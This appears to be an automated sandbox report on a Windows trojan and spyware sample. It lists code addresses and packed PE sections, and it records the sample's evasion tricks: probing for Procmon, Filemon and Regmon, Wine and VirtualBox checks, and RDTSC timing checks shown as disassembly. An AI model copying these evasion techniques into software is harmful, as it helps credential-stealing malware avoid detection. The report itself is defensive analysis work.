Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABD052	0_2_00ABD052
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B731B3	0_2_00B731B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3D1A2	0_2_00B3D1A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE91AD	0_2_00BE91AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2F1A7	0_2_00B2F1A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE319D	0_2_00BE319D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B371F4	0_2_00B371F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0118A	0_2_00C0118A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B871EC	0_2_00B871EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B051E7	0_2_00B051E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1F1EF	0_2_00B1F1EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B331DE	0_2_00B331DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3F1C6	0_2_00B3F1C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B791CF	0_2_00B791CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF1D0	0_2_00ACF1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD1130	0_2_00BD1130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE712B	0_2_00BE712B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF9137	0_2_00AF9137
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB910B	0_2_00AB910B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAB11D	0_2_00BAB11D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4F106	0_2_00B4F106
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B31108	0_2_00B31108
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA517E	0_2_00BA517E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B13163	0_2_00B13163
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B09162	0_2_00B09162
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1B15C	0_2_00B1B15C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB1143	0_2_00BB1143
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B59149	0_2_00B59149
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1514C	0_2_00B1514C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE52B0	0_2_00BE52B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B852AB	0_2_00B852AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6F2AF	0_2_00B6F2AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD529E	0_2_00BD529E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BED295	0_2_00BED295
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B83286	0_2_00B83286
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB32E2	0_2_00AB32E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF2E0	0_2_00ACF2E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B692C7	0_2_00B692C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B632CF	0_2_00B632CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA7236	0_2_00BA7236
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAD235	0_2_00BAD235
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B35220	0_2_00B35220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1B228	0_2_00B1B228
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFB223	0_2_00BFB223
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9F20D	0_2_00B9F20D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA3206	0_2_00BA3206
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B25264	0_2_00B25264
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6521A	0_2_00C6521A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB3247	0_2_00AB3247
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF9248	0_2_00BF9248
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B233A6	0_2_00B233A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B993AE	0_2_00B993AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6139A	0_2_00B6139A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAB390	0_2_00AAB390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD3386	0_2_00BD3386
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFF3E7	0_2_00BFF3E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B473EF	0_2_00B473EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC33D4	0_2_00BC33D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB910B	0_2_00AB910B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ACF3C0	0_2_00ACF3C0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00AA4B00 appears 66 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00A99080 appears 54 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 1.0003633720930232
Source: file.exe	Static PE information: Section: yjzienyf ZLIB complexity 0.9945862808549066

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00ABE450 CoCreateInstance,

0_2_00ABE450

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1312111877.0000000005466000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1336288565.0000000005448000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1312599913.0000000005448000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 39%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 1870848 > 1048576

Source: file.exe

Static PE information: Raw size of yjzienyf is bigger than: 0x100000 < 0x19f400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.a90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yjzienyf:EW;xccchzgg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yjzienyf:EW;xccchzgg:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d6aef should be: 0x1d4c85

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: yjzienyf
Source: file.exe	Static PE information: section name: xccchzgg
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF20A7 push 3EAA57E4h; mov dword ptr [esp], esi	0_2_00AF20AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF20F3 push eax; mov dword ptr [esp], ecx	0_2_00AF2106
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB0035 push 5C17A471h; mov dword ptr [esp], ecx	0_2_00BB05DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB0035 push 6AC719B5h; mov dword ptr [esp], edx	0_2_00BB0602
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB0035 push esi; mov dword ptr [esp], ecx	0_2_00BB062A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D74076 push esi; mov dword ptr [esp], eax	0_2_00D740C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D74076 push esi; mov dword ptr [esp], eax	0_2_00D740E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF0001 push ecx; mov dword ptr [esp], ebx	0_2_00AF2805
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF0001 push 6ABA8FBAh; mov dword ptr [esp], ebp	0_2_00AF280D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEC01F push esi; mov dword ptr [esp], eax	0_2_00AEC20C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1201C push edi; mov dword ptr [esp], eax	0_2_00C12077
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1201C push ecx; mov dword ptr [esp], eax	0_2_00C12090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1201C push 5582F69Ah; mov dword ptr [esp], ebx	0_2_00C12159
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1201C push edi; mov dword ptr [esp], 33A48DD4h	0_2_00C1215D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1201C push ebx; mov dword ptr [esp], ebp	0_2_00C121AB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E182 push ebx; mov dword ptr [esp], ecx	0_2_00B4E1E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E182 push 3423EED2h; mov dword ptr [esp], edx	0_2_00B4E251
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E182 push ecx; mov dword ptr [esp], eax	0_2_00B4E2E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E182 push ecx; mov dword ptr [esp], esi	0_2_00B4E2EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE4180 push ecx; mov dword ptr [esp], esi	0_2_00CE4281
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0015B push ebp; mov dword ptr [esp], edi	0_2_00C00218
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0015B push 1429DF18h; mov dword ptr [esp], edi	0_2_00C00245
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0015B push edi; mov dword ptr [esp], 3C9A7FA4h	0_2_00C00257
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0015B push eax; mov dword ptr [esp], edx	0_2_00C00276
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0015B push ebp; mov dword ptr [esp], 0BDFE2B0h	0_2_00C002F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDE16C push edi; mov dword ptr [esp], edx	0_2_00CDE1DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD414C push eax; mov dword ptr [esp], 7FBFA0C8h	0_2_00BD46D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD414C push edx; mov dword ptr [esp], 2B97EAF5h	0_2_00BD47A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD414C push 69269A32h; mov dword ptr [esp], edx	0_2_00BD47E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF22A0 push 606CA96Ch; mov dword ptr [esp], ebp	0_2_00AF22AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEC2ED push 791AABA7h; mov dword ptr [esp], ebp	0_2_00AEC2F8

Source: file.exe	Static PE information: section name: entropy: 7.977158062158779
Source: file.exe	Static PE information: section name: yjzienyf entropy: 7.9544746037347664

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F33A second address: C6F35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518348h 0x00000007 jl 00007F29FC518342h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F728 second address: C6F72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F72D second address: C6F73D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC51833Ah 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F73D second address: C6F751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43470h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F8AC second address: C6F8C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC51833Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6F8C0 second address: C6F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71335 second address: C7133B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C713C9 second address: C7141C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD4346Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jno 00007F29FCD43468h 0x00000011 pop ebx 0x00000012 nop 0x00000013 movzx esi, bx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F29FCD43468h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D37FDh] 0x00000038 push EABA721Ah 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 ja 00007F29FCD43466h 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C715F6 second address: C71653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 jmp 00007F29FC518346h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F29FC518338h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D25F0h], ebx 0x0000002f push 00000000h 0x00000031 sub cx, 4883h 0x00000036 call 00007F29FC518339h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push eax 0x0000003f pop eax 0x00000040 pop eax 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71653 second address: C7168E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43470h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F29FCD43478h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F29FCD43466h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7168E second address: C71692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71692 second address: C71698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71698 second address: C716CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jne 00007F29FC518340h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 jmp 00007F29FC51833Ah 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C716CE second address: C716D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C716D3 second address: C7175E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29FC518336h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e or si, 1DD4h 0x00000013 push 00000003h 0x00000015 mov ecx, 60655A36h 0x0000001a jg 00007F29FC518339h 0x00000020 push 00000000h 0x00000022 push 00000003h 0x00000024 xor dword ptr [ebp+122D1B06h], edi 0x0000002a push 4B9198E1h 0x0000002f jmp 00007F29FC518348h 0x00000034 add dword ptr [esp], 746E671Fh 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F29FC518338h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 sub edx, dword ptr [ebp+122D37B5h] 0x0000005b lea ebx, dword ptr [ebp+12458266h] 0x00000061 mov edi, dword ptr [ebp+122D250Ch] 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b jng 00007F29FC518336h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7175E second address: C71768 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93677 second address: C93681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F29FC518336h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93681 second address: C9368F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD4346Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9368F second address: C93694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6679C second address: C667A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C917DE second address: C917E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C917E4 second address: C917EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C917EF second address: C917F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91AD7 second address: C91ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91ADB second address: C91AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F29FC51833Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91C89 second address: C91CA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007F29FCD43466h 0x00000009 jmp 00007F29FCD4346Eh 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91CA8 second address: C91CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F29FC51833Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C91F83 second address: C91F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9212D second address: C92131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C92444 second address: C9247C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43473h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnc 00007F29FCD43476h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 js 00007F29FCD43466h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C89EA8 second address: C89EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63130 second address: C63148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43474h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63148 second address: C63168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F29FC518336h 0x0000000d jmp 00007F29FC518342h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63168 second address: C6316E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6316E second address: C63172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
